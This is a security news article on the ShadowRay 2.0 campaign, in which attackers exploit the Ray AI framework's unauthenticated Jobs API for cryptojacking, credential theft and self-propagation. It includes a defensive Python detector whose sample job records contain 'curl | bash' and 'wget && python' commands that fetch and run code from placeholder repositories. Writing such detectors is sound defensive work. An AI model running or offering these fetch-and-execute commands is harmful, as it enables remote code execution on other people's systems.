
Two-Year-Old Ray AI Framework Flaw Exploited in Ongoing Campaign

Threat actors are abusing Ray’s lack of authentication to compromise exposed clusters and deploy LLM-generated payloads and cryptocurrency miners. The post Two-Year-Old Ray AI Framework Flaw Exploited in Ongoing Campaign appeared first on SecurityWeek.


Threat actors are exploiting a two-year-old vulnerability in the Ray AI framework in a fresh campaign that hit numerous clusters, Oligo reports.

Maintained by Anyscale, Ray is an open source framework for scaling Python-based AI and ML applications. Ray clusters can be deployed into the cloud to scale workloads, and should be secured and isolated in safe network environments, as the framework does not implement authentication.

The issue, tracked as CVE-2023-48022 (CVSS score of 9.8), allows remote, unauthenticated attackers to execute arbitrary code via the framework’s Jobs API.

Anyscale disputed the bug, pointing out that Ray’s documentation clearly states that clusters should not be used outside controlled network environments, but said last year it would implement login and authentication mechanisms in a future release.

However, it wasn’t until Oligo discovered that hundreds of Ray clusters had been compromised in a data-theft campaign dubbed ShadowRay that the maintainers revisited their stance on authentication.

Now, two years after CVE-2023-48022 was publicly disclosed and a year and a half after the ShadowRay campaign was discovered, multiple threat actors are exploiting Ray’s lack of authentication to abuse internet-accessible clusters, Oligo reports.

As part of the fresh campaign, dubbed ShadowRay 2.0, multiple threat actors have been abusing the flaw to take over computing resources as part of crypto-mining operations.

One adversary, named IronErn440, has been using Ray’s legitimate orchestration features to autonomously propagate their cryptojacking activity, Oligo says.

To evade detection, the attackers were seen limiting CPU usage, masquerading their tools as legitimate processes, and hiding GPU usage from monitoring tools. They have also deployed malware and abused legitimate code-sharing platforms for payload delivery.

The campaign, Oligo says, has been active since September 2024, building “a multi-purpose botnet capable of DDoS attacks, data exfiltration, and global autonomous propagation”.

In early November, the threat actors were abusing GitLab for payload staging, but migrated to GitHub after the initial repository was removed, and were seen immediately creating a new repository after the second one was removed.

As part of the GitLab-launched attacks, the threat actor used out-of-band platforms to automatically identify vulnerable targets, and then submitted malicious jobs to perform reconnaissance and execute Bash and Python payloads created using AI.

They moved laterally to all nodes in the cluster using Ray’s legitimate orchestration features, and deployed a multi-stage Python payload designed to identify cluster resources, calculate optimal allocation, and submit a takeover job using those resource requirements.
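For defenders reviewing what has been submitted to their own clusters, the sketch below flags job entrypoints that pull content from the code-sharing platforms named above. It is an added example, not code from Oligo or the Ray project; the record fields (`submission_id`, `entrypoint`), the allowlist prefix, and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlparse

# Code-sharing platforms the article names as payload staging hosts.
STAGING_HOSTS = ("gitlab.com", "github.com", "githubusercontent.com")
# Assumption: repository path prefixes your own teams legitimately pull from.
ALLOWED_REPO_PREFIXES = ("/example-org/",)
URL_RE = re.compile(r"https?://[^\s'\"|;)]+")
# Fetched content piped straight into a shell or Python interpreter.
PIPE_TO_INTERP_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:(?:ba|z|da)?sh|python[\d.]*)\b")

def staging_urls(entrypoint):
    """Return URLs on code-sharing hosts that are outside the allowlist."""
    hits = []
    for url in URL_RE.findall(entrypoint):
        parsed = urlparse(url)
        host = (parsed.hostname or "").lower()
        on_staging_host = any(host == h or host.endswith("." + h) for h in STAGING_HOSTS)
        if on_staging_host and not parsed.path.startswith(ALLOWED_REPO_PREFIXES):
            hits.append(url)
    return hits

def review_jobs(jobs):
    """Return (submission_id, severity, urls) for each job worth a closer look."""
    findings = []
    for job in jobs:
        entry = job.get("entrypoint", "")
        urls = staging_urls(entry)
        if not urls:
            continue
        # Download-and-execute in one step is treated as the stronger signal.
        severity = "high" if PIPE_TO_INTERP_RE.search(entry) else "review"
        findings.append((job.get("submission_id"), severity, urls))
    return findings

# Constructed sample records (hypothetical job listing export, not real data).
SAMPLE_JOBS = [
    {"submission_id": "raysubmit_a1", "entrypoint": "python train.py --epochs 3"},
    {"submission_id": "raysubmit_b2", "entrypoint":
        "curl -s https://gitlab.com/placeholder-user/placeholder-repo/-/raw/main/run.sh | bash"},
    {"submission_id": "raysubmit_c3", "entrypoint":
        "pip install git+https://github.com/example-org/internal-lib.git && python eval.py"},
    {"submission_id": "raysubmit_d4", "entrypoint":
        "wget -q https://raw.githubusercontent.com/placeholder-user/placeholder-repo/main/stage.py"
        " -O /tmp/s.py && python /tmp/s.py"},
]

if __name__ == "__main__":
    for finding in review_jobs(SAMPLE_JOBS):
        print(finding)
```

A match is a prompt for review rather than proof of compromise, since legitimate jobs also install dependencies from these platforms; the allowlist is where that tuning belongs.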

“The payloads from GitLab are likely to be AI-generated, based on its structure, comments, and error handling patterns. Attackers are now using AI to generate attack code targeting AI infrastructure,” Oligo notes.

The security firm also observed the deployment of multiple interactive reverse shells to AWS-hosted command-and-control (C&C) servers. The abundance of shells suggests either a sophisticated failover mechanism, or that multiple attackers could be targeting Ray clusters and competing for the resources.

The campaign specifically targeted clusters with NVIDIA GPUs for cryptojacking, and deployed multiple persistence tools and scripts to identify and terminate rival crypto-miners running on the compromised clusters.

Based on active commits in IronErn440’s GitLab repository, Oligo believes that the threat actor was updating the payloads in real time. The updates would propagate across the network within hours.

“This is DevOps for cybercrime. Attackers used GitLab as their CI/CD pipeline for malware distribution. They can A/B test techniques, roll back failed updates, and respond to defensive measures – all through version control. The commit history showed active development in real time,” Oligo notes.

Additionally, the attackers abused the compromised clusters to steal credentials, providing them with root access to MySQL databases deployed in production. Tokens and cloud credentials were also found on the compromised workloads, as well as proprietary, custom models on some instances.

The threat actor also deployed a TCP state exhaustion tool called Sockstress, which suggests they could be weaponizing the Ray clusters for distributed denial-of-service (DDoS) attacks.

“Compromised Ray clusters were used to spray attack payloads to other Ray dashboards worldwide. The attackers essentially created a self-propagating worm that uses one victim to scan for and compromise the next victim,” Oligo notes.

After moving their infrastructure to GitHub, the attackers were seen compromising clusters with thousands of nodes and fully utilizing their CPUs for crypto-mining and updating their tools.

One of the compromised servers contained 240 gigabytes of source code, AI models, and datasheets, Oligo says.

The security firm’s scans uncovered more than 230,000 Ray servers accessible from the web. Many servers belonging to startups, research organizations, and AI environments have been compromised in this campaign.
